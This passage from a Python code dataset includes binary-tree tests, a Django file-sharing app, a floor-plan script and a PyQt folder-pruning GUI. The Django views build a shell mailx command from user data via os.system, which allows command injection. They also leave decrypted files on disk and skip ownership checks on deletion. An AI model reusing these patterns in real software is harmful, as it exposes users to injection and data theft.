self.assertEqual(binary_tree_2.get_height(), 3)\n\n binary_tree_3 = BinaryTree()\n node_values_3 = [14, 7, 12, 11, 10, 6, 9]\n for val in node_values_3:\n binary_tree_3.add(Node(val))\n self.assertEqual(binary_tree_3.get_height(), 5)\n\n def test_call_get_height_of_empty_tree(self):\n \"\"\"\n (negative testing of get_height function)\n Create an empty binary tree and a binary tree with non-integer root value.\n Test that call of get_height method of created binary trees returns None\n \"\"\"\n binary_tree_1 = BinaryTree()\n binary_tree_2 = BinaryTree('non-integer')\n self.assertEqual(binary_tree_1.get_height(), None)\n self.assertEqual(binary_tree_2.get_height(), None)\n\n def test_binary_tree_from_generator_and_get_height(self):\n \"\"\"\n (end-to-end testing of get_height function)\n Create a binary tree with a root.\n Add nodes from generator to the binary tree.\n Test that the height of the binary tree is equal to the generator length\n \"\"\"\n binary_tree = BinaryTree(0)\n for val in range(1, 50):\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.get_height(), len(range(1, 50)))\n\n def test_get_dfs_of_binary_trees(self):\n \"\"\"\n (positive testing of get_dfs function)\n Create binary trees with different node values and sequence.\n Test that their DFS is traversed correctly\n \"\"\"\n binary_tree_1 = BinaryTree()\n node_values_1 = [6, 5, 11, 12, 2, 7]\n dfs_1 = [6, 5, 2, 11, 7, 12]\n for val in node_values_1:\n binary_tree_1.add(Node(val))\n binary_tree_1.get_dfs()\n self.assertEqual(binary_tree_1.dfs_nodes, dfs_1)\n\n binary_tree_2 = BinaryTree()\n node_values_2 = [14, 7, 12, 11, 10, 6]\n dfs_2 = [14, 7, 6, 12, 11, 10]\n for val in node_values_2:\n binary_tree_2.add(Node(val))\n binary_tree_2.get_dfs()\n self.assertEqual(binary_tree_2.dfs_nodes, dfs_2)\n\n def test_get_dfs_empty_tree(self):\n \"\"\"\n (negative testing of get_dfs function)\n Create an empty binary tree.\n Test that the DFS traversal cannot be implemented\n \"\"\"\n binary_tree = BinaryTree()\n binary_tree.get_dfs()\n self.assertFalse(binary_tree.dfs_nodes)\n\n def test_get_dfs_3(self):\n \"\"\"\n (end-to-end testing of get_dfs function)\n Create an empty binary tree.\n Add the root node to the binary tree.\n Add other nodes to the binary tree.\n Test that the DFS is traversed correctly on different stages\n \"\"\"\n binary_tree = BinaryTree()\n root_value = [15]\n node_values = [14, 13, 17, 25, 8]\n dfs = [15, 14, 13, 8, 17, 25]\n\n binary_tree.add(Node(root_value[0]))\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, root_value)\n\n for val in node_values:\n binary_tree.add(Node(val))\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, dfs)\n\n binary_tree.add(Node(30))\n dfs.append(30)\n binary_tree.get_dfs()\n self.assertEqual(binary_tree.dfs_nodes, dfs)\n","sub_path":"binarytree/binarytree_test.py","file_name":"binarytree_test.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193339195","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView, View\nfrom .models import Files, Crypt, Thumb\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.models import User\nfrom .forms import FileAuthForm1, FileAuthForm2, FileAuthForm3\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom Crypto.Cipher import AES\nfrom twilio.rest import Client\nimport hashlib, threading, time\nfrom groups.models import MyGroup\nimport os\n\naccount_sid = \"\"\nauth_token = \"\"\n\nclass ResetView(View):\n\tdef get(self, request, *args, **kwargs):\n\n\t\treturn render(request, 'fileshare/file_reset.html')\n\n\tdef post(self, request, *args, **kwargs):\n\t\tfiles = Files.objects.filter(author = request.user)\n\t\tgroups = MyGroup.objects.filter(creator = request.user)\n\t\tfcount = 0\n\t\tgcount = 0\n\n\t\tfor file in files:\n\t\t\tFiles.delete(file)\n\t\t\tfcount += 1\n\t\tfor group in groups:\n\t\t\tMyGroup.delete(group)\n\t\t\tgcount += 1\n\t\trequest.user.profile.total_owned_files = 0\n\t\trequest.user.profile.total_owned_groups = 0\n\t\trequest.user.profile.total_uploaded_files = 0\n\t\trequest.user.profile.total_download_files = 0\n\t\trequest.user.profile.save()\n\t\tmessages.info(request,f\"A total of {fcount} files were deleted and {gcount} groups were deleted\")\n\t\treturn redirect('fileshare_dashboard')\n\nclass VPN(LoginRequiredMixin, View):\n\tdef get(self, request, *args, **kwargs):\n\t\taddress = request.user.email\n\t\tfile1 = 'UK.ovpn'\n\t\tfile2 = 'Germany.ovpn'\n\t\tphones = 'https://play.google.com/store/apps/details?id=net.openvpn.openvpn'\n\t\tcomp = \"https://openvpn.net/client-connect-vpn-for-windows/\"\n\t\tbody1 = \"{self.request.user} has requested to send the keys to the VPN to this email. \"\n\t\tbody2 = \"If you would like to access the VPN on your smartphone click on this link| {phones} |\"\n\t\tbody3 = \"If you would like to access the VPN on your computer click on this link| {comp} | \"\n\t\tbody4 = \"Use these files to connect to your desired location\"\n\t\tsubject = \"VPN\"\n\t\tos.system(f\"echo '{self.request.user} has requested to send the keys to the VPN to this email. If you would like to access the VPN on your smartphone click on this link| {phones} | If you would like to access the VPN on your computer click on this link| {comp} | Use these files to connect to your desired location' | mailx -s {subject} {address} -A {file1} -A {file2}\")\n\t\treturn redirect('fileshare_dashboard')\n\n\ndef has_num(number):\n\tif number == None:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef blank(request):\n\treturn render(request, 'fileshare/tab.html')\n\ndef dashboard(request):\n\tif request.user.is_authenticated:\n\t\tfiles = Files.objects.filter(author=request.user)\n\t\tgroups = MyGroup.objects.filter(creator=request.user)\n\t\trequest.user.profile.total_groups = len(groups)\n\t\trequest.user.profile.total_owned_files = len(files)\n\t\tspace = 0\n\t\tfor file in files:\n\t\t\tspace += os.path.getsize(file.doc.path)\n\t\trequest.user.profile.space = space \n\n\n\t\trequest.user.profile.save()\n\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\n\t\tif request.user.is_superuser:\n\t\t\tcontext = {'docs':Files.objects.all()}\n\t\telse:\n\t\t\tcontext = {'docs':Files.objects.all()}\n\t\treturn render(request, 'fileshare/dashboard.html', context)\n\n\treturn render(request, 'users/login.html')\n\ndef recrypt(file, data):\n\ttime.sleep(4)\n\twith open(file, 'wb') as we:\n\t\twe.write(data)\n\treturn\n\ndef read_file(file):\n\tprint(\"WE MADE IT TO READ FILE\")\n\twith open(file, 'rb') as e:\n\t\treturn e.read()\ndef write_file(file, data):\n\twith open(file, 'wb') as df:\n\t\tdf.write(data)\n\treturn\n\ndef send_msg(receiver, message):\n\taccount_sid = \"\"\n\tauth_token = \"\"\n\tclient = Client(account_sid, auth_token)\n\tmsg = client.messages.create(\n\tfrom_ = \"9292012004\",\n\tto = f\"+1{receiver}\",\n\tbody = message\n)\n\nclass FileAuth(View, LoginRequiredMixin):\n\tdef get(self, request, *args, **kwargs):\n\t\tRlink1 = \"fileshare_dashboard\"\n\t\tauth = Files.objects.get(pk=kwargs.get('pk'))\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\t\tif auth.encryption == Files.OPT1:\n\t\t\tpform = FileAuthForm1()\n\t\telif auth.encryption == Files.OPT2:\n\t\t\tpform = FileAuthForm2()\n\t\telif auth.encryption == Files.OPT3:\n\t\t\tpform = FileAuthForm3()\n\t\telse:\n\t\t\tmessages.success(request, f'This form is not encrypted')\n\t\t\tpform = FileAuthForm2()\n\n\t\tcontext = {'pform':pform}\n\t\treturn render(request, 'fileshare/file_auth.html', context)\n\n\tdef post(self, request, *args, **kwargs):\n\t\tRlink1 = \"fileshare_dashboard\"\n\t\tmode = AES.MODE_CFB\n\t\tauth = Files.objects.get(pk=kwargs.get('pk'))\n\t\tnumber = has_num(request.user.profile.phone)\n\t\tif not number:\n\t\t\tmessages.info(request, f'Please go to profile and update phone number field for text notifications and better security')\n\t\tif auth.encryption == Files.OPT1:\n\t\t\tif request.POST['pin'] == auth.pin and auth.author.ivk.iv == request.user.ivk.iv:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\n\t\t\t\tE_F = \"\"\n\t\t\t\tD_F = \"\"\n\t\t\t\tkey = hashlib.sha256(auth.pin.encode(\"utf8\")).digest()\n\t\t\t\tiv = auth.author.ivk.iv[:16].encode(\"utf8\")\n\t\t\t\tcipher = AES.new(key, mode, iv)\n\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\t\tif request.user != auth.creator:\n\t\t\t\t\tmessage.error(request, 'File encrypted using IVK which is unique for each account')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telif auth.encryption == Files.OPT2:\n\t\t\tif request.user.ivk.iv == auth.author.ivk.iv:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\t\t\t#send_msg(request.user.profile.phone, msg)\n\n\t\t\t\tkey = hashlib.sha256(request.user.ivk.iv[:16].encode(\"utf8\")).digest()\n\t\t\t\tcipher = AES.new(key, mode, auth.author.ivk.iv[:16].encode(\"utf8\"))\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telif auth.encryption == Files.OPT3:\n\t\t\tif request.POST['pin'] == auth.pin:\n\t\t\t\tmessages.success(request, f'AUTHENTICATED. The file will lock itself after 4 SECONDS')\n\t\t\t\trequest.user.profile.total_download_files += 1\n\t\t\t\trequest.user.profile.save()\n\t\t\t\tif number:\n\t\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\t\tkey = hashlib.sha256(auth.pin.encode(\"utf8\")).digest()\n\t\t\t\tcipher = AES.new(key, mode, Files.piv(auth).encode(\"utf8\"))\n\t\t\t\tE_F = read_file(auth.doc.path)\n\t\t\t\tD_F = cipher.decrypt(E_F)\n\t\t\t\twrite_file(auth.doc.path, D_F)\n\t\t\t\tRR = threading.Thread(target = recrypt, args = [auth.doc.path, E_F])\n\t\t\t\tRR.start()\n\t\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\n\t\t\telse:\n\t\t\t\tmessages.success(request, f'NOT AUTHENTICATED')\n\t\t\treturn redirect(Rlink1)\n\n\n\t\telse:\n\t\t\tmessages.success(request, f'NO AUTHENTICATION REQUIRED')\n\t\t\trequest.user.profile.total_download_files += 1\n\t\t\trequest.user.profile.save()\n\t\t\tif number:\n\t\t\t\tmsg = f\"User {request.user} has accessed file {str(auth.doc)[6:]} labeled {auth.title}\"\n\t\t\treturn render(request, 'fileshare/file_view.html', {'item':auth})\n\nclass PostListView(LoginRequiredMixin, View):\n\tpaginate_by = 100\n\tdef get(self, request, *args, **kwargs):\n\t\tfiles = Files.objects.all()\n\t\towned_files = []\n\t\towned_groups = []\n\t\ttotal_groups = 0\n\t\tpart_of = []\n\t\tcan_remove = [] #27\n\t\tcan_view = [] #28\n\t\tgroup = MyGroup.objects.all()\n\t\tcontext = {}\n\t\ttotal_files = 0\n\t\ttotal_given_files = 0\n\t\tgiven_files = []\n\n\n\t\tfor item in group: # check groups\n\t\t\tif item.creator != request.user: # Group not created by you\n\t\t\t\tfor user in item.user_set.all(): # Checking users in group\n\t\t\t\t\tif user == request.user: # If you in a group that you did not create\n\t\t\t\t\t\ttotal_groups += 1\n\t\t\t\t\t\tif item.permissions.all(): # Group has permissions\n\t\t\t\t\t\t\tfor perm in item.permissions.all(): # For every Permission\n\t\t\t\t\t\t\t\tif perm.id == 27: # if its delete\n\t\t\t\t\t\t\t\t\tfor file in item.files_set.all(): # Checking files in that group with that permission\n\t\t\t\t\t\t\t\t\t\tif not (file in can_remove): # Duplication check\n\t\t\t\t\t\t\t\t\t\t\tcan_remove.append(file) # Files you can delete\n\t\t\t\t\t\t\t\telif perm.id == 28: # If its view\n\t\t\t\t\t\t\t\t\tfor file in item.files_set.all(): # Checking files in that group with that permission\n\t\t\t\t\t\t\t\t\t\tif not (file in can_view): # Duplication check\n\t\t\t\t\t\t\t\t\t\t\tcan_view.append(file) # Files you can view\n\t\t\t\t\t\telse: # Group has no permissions no permissions\n\t\t\t\t\t\t\tfor file in item.files_set.all():\n\t\t\t\t\t\t\t\tif not (file in given_files): # Duplication check\n\t\t\t\t\t\t\t\t\tgiven_files.append(file) # Files you can view\n\t\t\telse:\n\t\t\t\towned_groups.append(item)\n\n\t\tfor i in can_remove:\n\t\t\tgiven_files.append(i)\n\n\t\tfor i in can_view:\n\t\t\tgiven_files.append(i)\n\n\t\tfor item in files:\n\t\t\tif item.author == request.user:\n\t\t\t\towned_files.append(item)\n\n\t\tfor c1 in owned_files:\n\t\t\ttotal_files +=1\n\n\t\tfor c2 in given_files:\n\t\t\ttotal_given_files += 1\n\n\t\tfor c3 in owned_groups:\n\t\t\ttotal_groups += 1\n\n\n\t\trequest.user.profile.total_given_files = total_given_files\n\t\trequest.user.profile.save()\n\n\t\tcontext = {'files':files, 'owned_files':owned_files, 'total_given_files':total_given_files, 'total_files':total_files, 'can_remove':can_remove, 'can_view':can_view, 'owned_groups':owned_groups, 'given_files':given_files}\n\t\tfor item in files:\n\n\t\t\tif item.encryption == 'None':\n\t\t\t\titem.thumbnail = Thumb.thumb(item.doc)\n\t\t\telse:\n\t\t\t\titem.thumbnail = 'locked.jpg'\n\n\t\treturn render(request, 'fileshare/file_home.html', context)\n\n\tdef post(self, request, *args, **kwargs):\n\t\tpass\n\n\nclass PostCreateView(LoginRequiredMixin, CreateView):\n\tmodel = Files\n\ttemplate_name = 'fileshare/new_file.html'\n\tfields = ['title', 'doc', 'encryption', 'pin']\n\tsuccess_url = '/files'\n\n\tdef form_valid(self, form):\n\t\tform.instance.author = self.request.user\n\t\tself.request.user.profile.total_uploaded_files += 1\n\t\tself.request.user.profile.save()\n\t\treturn super().form_valid(form)\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n\tmodel = Files\n\tfields = ['title', 'doc']\n\ttemplate_name = 'fileshare/file_update.html'\n\n\tdef test_func(self):\n\t\tpost = self.get_object()\n\t\tif self.request.user == post.author:\n\t\t\treturn True\n\t\treturn False\n\nclass PostDeleteView(LoginRequiredMixin, DeleteView):\n\tmodel = Files\n\ttemplate_name = 'fileshare/file_delete.html'\n\tsuccess_url = '/files'\n\n\tdef test_func(self):\n\t\tpost = self.get_object()\n\t\tif self.request.user == post.author:\n\t\t\treturn True\n\t\treturn False\n","sub_path":"finalcap/fileshare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"570070285","text":"# Welcome to floormaker, the ultimate resolution to all your floor making needs, enjoy\n# This bad boy builds a floor of a garage\ndef floorMkr(row,col):\n floorNum=1\n columnHeader=\"\"\n colCount=1\n for i in range(col):\n columnHeader+=\"| Column \"+str(colCount)+\" \"\n colCount+=1\n columnHeader+=\"|\"\n border=\"----------------------------------------------------------------------------------------------------------------------------\"\n print(border)\n print(\"Floor \",floorNum)\n print(border)\n print(columnHeader)\n print(border)\n # variable floor houses the matrix used to generate and populate the floor plan with cartesian coordinates\n floor=[]\n # below are the 4 counters used to manage the population of matrix 'floor' with cartesian coordinates\n # this here if statement determines if the requested floor plan is of valid dimensions, row and column counts must both be 'odd'\n if row>2 and col>2 and row%2==1 and col%2==1:\n # the outer loop populates the rows of the matrix and resets row and column counters\n y=(col+1)//2 # y coordinate val\n for i in range(col):\n floor.append([])\n xs=0 # if xs is 0 x values will decrease, if xs is 1 x values will increase\n ys=0 # if ys is 0 y values will decrease, if ys is 1 y values will increase\n # initial values are (x : The bounds of 'floor' domain, y : The bounds of 'floor range, v : row tracker, w : column tracker \n if ys==0:\n y-=1\n else:\n y+=1\n if y==0:\n ys==1\n x=(row-1)//2 # x coordinate val\n # the inner loop populates the columns of the matrix\n for j in range(row):\n if xs==0:\n floor[i].append([(-x,y,0,0,0)])\n else:\n floor[i].append([(x,y,0,0,0)])\n if xs==0:\n x-=1\n else:\n x+=1\n if x==0:\n xs=1\n #x\n #y\n #if \n #v\n #w\n print(floor[i])\n print(border)\n return floor\n else:\n print(\"Your arrays must both contain 3 or more items and contain an odd number of items\")\n\n#floorMkr(3,3)\n#print('__________________________________')\n#floorMkr(7,5)\n#print('__________________________________')\nfloorMkr(5,5)\n\n\n","sub_path":"floorMaker.py","file_name":"floorMaker.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"197945313","text":"import sys\nimport os\nimport time\nimport math\nfrom PyQt5.QtWidgets import QWidget, QToolTip, QPushButton, QMainWindow, QApplication, QMessageBox, QDesktopWidget, \\\n QFileDialog, QSlider, QAbstractSlider, QLineEdit, QGridLayout, QLabel, QTreeView, QFileSystemModel, QTreeWidget, \\\n QTreeWidgetItem, QAbstractItemView, QHeaderView, QHBoxLayout, QVBoxLayout\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nfrom PyQt5.QtGui import QFont, QIcon, QMovie, QStandardItemModel, QStandardItem\nfrom copy import deepcopy\nfrom compress_and_prune_v4_1 import read_and_count, simplify_tree, print_tree\n\n\n# BUG ALERT\n# BUG: simplify_tree crashes if all folders do not contain a single file due to dir_dict being empty\n# OPTIMIZATION\n# OPT: Bulk of processing time is from read_and_count, while simplify_tree is quick\n# Instead of current simplifyStructure where read_and_count is called constantly, only call read_and_count\n# when folder is changed.\nclass ZoomerMainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super(ZoomerMainWindow, self).__init__(parent)\n self.zoomer_widget = ZoomerWidget(self)\n self.setCentralWidget(self.zoomer_widget)\n self.initUI()\n\n def initUI(self):\n QToolTip.setFont(QFont('SansSerif', 10))\n self.statusBar().showMessage('Status message goes here.')\n self.setToolTip('GIMZoomer: File structure simplication program.')\n # self.setGeometry(300, 300, 300, 200)\n self.resize(640, 480)\n self.center()\n\n self.setWindowTitle('GIMZoomer')\n self.setWindowIcon(QIcon('web.png'))\n self.show()\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\nclass SimplifyThread(QThread):\n started = pyqtSignal()\n finished = pyqtSignal(dict)\n\n def __init__(self, root_path, dir_dict, prune_thold):\n QThread.__init__(self)\n self.root_path = root_path\n self.dir_dict = dir_dict\n self.prune_thold = prune_thold\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.started.emit()\n dir_dict = simplify_tree(self.root_path, 1, self.dir_dict, 0.95, self.prune_thold, print_=False)\n self.finished.emit(dir_dict)\n\n\nclass ZoomerWidget(QWidget):\n\n def __init__(self, parent=None):\n # super().__init__()\n # self.initUI()\n super(ZoomerWidget, self).__init__(parent)\n self.parent = parent\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('GIMZoomer')\n # self.prune_thold = 95 # only use when slider scroll direction is reversed\n self.prune_thold = 4\n # self.root_path = os.path.expanduser('~')\n self.root_path = os.path.expanduser('C:\\\\Users\\\\ultra\\\\Dropbox\\\\mcgill')\n # self.root_path = os.path.expanduser('C:\\\\Users\\\\ultra\\\\Documents')\n\n # grid = QGridLayout()\n # grid.setSpacing(10)\n # grid.setColumnStretch(3, 8)\n\n # self.proc_lbl = QLabel()\n # self.proc_lbl.setAlignment(Qt.AlignCenter)\n # self.proc_mov = QMovie('ajax-loader.gif')\n # self.proc_lbl.setMovie(self.proc_mov)\n # # self.proc_lbl.setText('placeholder')\n # # self.proc_mov.start()\n\n select_btn = QPushButton('Select Folder', self)\n select_btn.setToolTip('Select root folder to simplify.')\n select_btn.clicked.connect(self.showFileDialog)\n select_btn.resize(select_btn.sizeHint())\n # grid.addWidget(select_btn, 0, 0)\n\n # self.folder_edit = QLineEdit()\n # self.folder_edit.setReadOnly(True)\n self.folder_edit = QLabel()\n self.folder_edit.setText(self.root_path)\n # grid.addWidget(self.folder_edit, 0, 1)\n\n self.status_label = QLabel()\n self.status_label.setText('')\n\n self.slider_label_top = QLabel()\n self.slider_label_top.setAlignment(Qt.AlignCenter)\n # self.slider_label_top.setText('Pruning\\nThreshold:\\n' + '{:.3f}'.format(self.scalePruning(self.prune_thold)))\n self.slider_label_top.setText('Few important folders')\n # grid.addWidget(self.slider_label_top, 1, 0)\n\n self.slider_label_btm = QLabel()\n self.slider_label_btm.setAlignment(Qt.AlignCenter)\n self.slider_label_btm.setText('All folders')\n\n slider = QSlider(Qt.Vertical, self) # for dynamically changing pruning threshold, default is 0.02\n slider.setValue(self.prune_thold)\n # grid.addWidget(slider, 2, 4, 1, 5)\n slider.setTickPosition(QSlider.TicksBothSides)\n slider.setTickInterval(10)\n slider.valueChanged[int].connect(self.changeValue)\n # slider.setInvertedAppearance(True)\n\n ogtree_label = QLabel()\n ogtree_label.setAlignment(Qt.AlignCenter)\n ogtree_label.setText('Original Structure')\n\n tree_label = QLabel()\n tree_label.setAlignment(Qt.AlignCenter)\n tree_label.setText('Pruned Structure\\n(Ordered by Folder Importance)')\n\n self.ogtree = QTreeView(self)\n self.ogtree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.ogmodel = QStandardItemModel()\n self.ogmodel.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.ogtree.header().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n self.tree = QTreeView(self)\n self.tree.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.model = QStandardItemModel()\n self.model.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n self.dir_dict, self.og_dir_dict = self.buildStructure(self.root_path)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n grid = QGridLayout()\n grid.addWidget(select_btn, 0, 0, 1, 1)\n grid.addWidget(self.folder_edit, 0, 1, 1, 7)\n grid.addWidget(self.status_label, 0, 8, 1, 1)\n grid.addWidget(ogtree_label, 1, 0, 1, 4)\n grid.addWidget(self.slider_label_top, 1, 4, 1, 1)\n grid.addWidget(tree_label, 1, 5, 1, 4)\n grid.addWidget(self.ogtree, 2, 0, 1, 4)\n grid.addWidget(slider, 2, 4, 1, 1, alignment=Qt.AlignHCenter)\n grid.addWidget(self.tree, 2, 5, 1, 4)\n grid.addWidget(self.slider_label_btm, 3, 4, 1, 1)\n\n self.setLayout(grid)\n # self.resize(640, 480)\n # self.show()\n\n def scalePruning(self, prune_thold):\n # # for reversing the slider scroll direction\n # scale_dict = dict(zip(range(100), range(100)[::-1]))\n # return scale_dict[prune_thold] * 0.005\n return prune_thold * 0.005\n # return math.log(prune_thold, 10)/2\n # return math.exp(prune_thold)/math.exp(100)\n\n def showFileDialog(self):\n dirpath = QFileDialog.getExistingDirectory(self, 'Select Folder', self.root_path)\n if dirpath:\n self.root_path = os.path.abspath(dirpath)\n self.folder_edit.setText(self.root_path)\n self.dir_dict, self.og_dir_dict = self.buildStructure(self.root_path)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n def changeValue(self, value):\n # print(value)\n self.prune_thold = value\n # self.slider_label.setText('Pruning\\nThreshold:\\n' + '{:.3f}'.format(self.scalePruning(self.prune_thold)))\n self.dir_dict = deepcopy(self.og_dir_dict)\n self.simplifyStructure(self.root_path, self.dir_dict, self.prune_thold)\n\n def buildStructure(self, root_path):\n dir_dict = read_and_count(root_path)\n og_dir_dict = deepcopy(dir_dict)\n self.refreshTreeView(self.ogmodel, self.ogtree, og_dir_dict)\n return og_dir_dict, dir_dict\n\n def simplifyStructure(self, root_path, dir_dict, prune_thold):\n def simplify_started():\n self.status_label.setText('Please wait...')\n self.parent.statusBar().showMessage('Hello World')\n\n def simplify_finished(returned_dict):\n self.refreshTreeView(self.model, self.tree, returned_dict)\n self.status_label.setText('')\n self.parent.statusBar().showMessage('Goodbye World')\n\n # [0] directory name, [1] parent key, [2] children keys,\n # [3] names of files found in directory, [4] cumulative count of accessible files\n # root_path = 'C:\\\\Users\\\\ultra\\\\Dropbox\\\\mcgill'\n # dir_dict = read_and_count(root_path)\n # og_dir_dict = deepcopy(dir_dict)\n # dir_dict = simplify_tree(root_path, 1, dir_dict, 0.95, self.scalePruning(prune_thold), print_=False)\n # self.status_label.setText('Please wait...')\n # self.parent.statusBar().showMessage('Hello World')\n simplify_worker = SimplifyThread(root_path, dir_dict, self.scalePruning(prune_thold))\n simplify_worker.started.connect(simplify_started)\n simplify_worker.finished.connect(simplify_finished)\n simplify_worker.start()\n # print_tree(root_path, dir_dict)\n\n # self.refreshTreeView(self.model, self.tree, dir_dict)\n\n # # self.ogmodel.clear()\n # # self.ogmodel.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.ogmodel.removeRow(0)\n # ogparent = self.ogmodel.invisibleRootItem()\n # self.append_all_children(1, og_dir_dict, ogparent) # dir_dict key starts at 1 since 0==False\n # self.ogtree.setModel(self.ogmodel)\n # self.ogtree.expandAll()\n # self.ogtree.resizeColumnToContents(0)\n # self.ogtree.resizeColumnToContents(1)\n # self.ogtree.resizeColumnToContents(2)\n\n # # self.model.clear()\n # # self.model.setHorizontalHeaderLabels(['Folder Name', 'Accessible Files', 'Number of Files'])\n # self.model.removeRow(0)\n # parent = self.model.invisibleRootItem()\n # self.append_all_children(1, dir_dict, parent) # dir_dict key starts at 1 since 0==False\n # self.tree.setModel(self.model)\n # self.tree.expandAll()\n # self.tree.resizeColumnToContents(0)\n # self.tree.resizeColumnToContents(1)\n # self.tree.resizeColumnToContents(2)\n\n # return dir_dict, og_dir_dict\n\n def refreshTreeView(self, model, tree, dir_dict):\n model.removeRow(0)\n parent = model.invisibleRootItem()\n self.append_all_children(1, dir_dict, parent) # dir_dict key starts at 1 since 0==False\n tree.setModel(model)\n # tree.expandAll()\n tree.expandToDepth(0)\n tree.resizeColumnToContents(0)\n tree.resizeColumnToContents(1)\n tree.resizeColumnToContents(2)\n\n def append_all_children(self, dirkey, dir_dict, qitem):\n qitem.appendRow([QStandardItem(dir_dict[dirkey][0]),\n QStandardItem(str(dir_dict[dirkey][4])),\n QStandardItem(str(len(dir_dict[dirkey][3])))])\n current_row = qitem.rowCount()-1\n # for child in sorted(dir_dict[dirkey][2]):\n # self.append_all_children(child, dir_dict, qitem.child(current_row))\n children_keys = dir_dict[dirkey][2]\n children_names = [dir_dict[child][0].lower() for child in children_keys]\n for child_name, child_key in sorted(zip(children_names, children_keys)):\n self.append_all_children(child_key, dir_dict, qitem.child(current_row))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n zmw = ZoomerMainWindow()\n # zw = ZoomerWidget()\n zmw.show()\n sys.exit(app.exec_())\n","sub_path":"archive/zoom_interface_v3_1.py","file_name":"zoom_interface_v3_1.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"190652266","text":"from .lifelines import Lifelines\nfrom .fragments import Fragments\n\nfrom .excepts import EmptyOptionalFragment\n\n\nclass SequenceDiagrams():\n\n def __init__(self):\n self.sequence_diagrams = []\n self.lifelines = []\n self.fragments = []\n\n def create_and_persist_lifelines(self, lifeline_name):\n lifeline = Lifelines(lifeline_name)\n self.lifelines.append(lifeline)\n\n def create_and_persist_fragments(\n self, fragment_name, fragment_represented\n ):\n\n if self.sequence_diagram_exists(fragment_represented) is True:\n fragment = Fragments(fragment_name, fragment_represented)\n self.fragments.append(fragment)\n\n else:\n raise EmptyOptionalFragment\n\n def lifeline_exists(self, name):\n for i in self.lifelines:\n if i.name == name:\n return True\n\n return False\n\n def sequence_diagram_exists(self, name):\n for i in self.sequence_diagrams:\n if i.name == name:\n return True\n\n return False\n\n def create_single_sequence_diagram(self, sequence_diagram):\n self.sequence_diagrams.append(sequence_diagram)\n\n def create_lifelines_xml(self, f):\n f.write(\"\\t\\n\")\n\n for lifeline in self.lifelines:\n lifeline.lifeline_to_xml(f)\n\n f.write(\"\\t\\n\")\n\n def create_fragments_xml(self, f):\n f.write(\"\\t\\n\")\n\n for fragment in 